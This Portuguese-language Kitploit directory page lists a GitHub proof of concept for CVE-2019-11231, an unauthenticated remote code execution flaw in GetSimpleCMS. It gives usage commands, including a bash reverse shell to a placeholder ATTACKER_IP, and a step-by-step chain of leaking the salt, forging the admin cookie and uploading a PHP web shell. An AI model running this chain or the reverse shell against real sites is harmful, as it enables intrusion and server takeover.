Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
Ferramentas/GitHubGitHub/akincibor/cve-2019-11231-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

Ver Repositório
1há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GetSimpleCMS CVE-2019-11231 RCE Exploit

Python CVE

Exploit de execução remota de código não autenticado para GetSimpleCMS ≤ 3.3.15

Vulnerabilidade

O GetSimpleCMS expõe arquivos sensíveis publicamente (/data/other/authorization.xml, /data/users/), permitindo que atacantes:

  1. Vazem chaves de API e nomes de usuário
  2. Forjem cookies de autenticação
  3. Obtenham tokens CSRF
  4. Enviem e executem código PHP arbitrário

Pontuação CVSS: 9.8 (Crítico)

Uso

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Como Funciona

Baixar ferramenta
  1. Enumerar versão → GET /admin/
  2. Vazar salt → GET /data/other/authorization.xml
  3. Obter nome de usuário → GET /data/users/
  4. Forjar cookie → SHA1(username + salt)
  5. Obter nonce → GET /admin/theme-edit.php
  6. Enviar shell → POST /admin/theme-edit.php
  7. Executar comandos → GET /theme/shell.php?cmd=...

Arquivos

  • exploit.py - Script principal do exploit
  • requirements.txt - Dependências (requests, beautifulsoup4)

Aviso Legal

⚠️ Apenas para fins educacionais. Teste somente em sistemas que você possui ou tem permissão para testar.

Referências

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231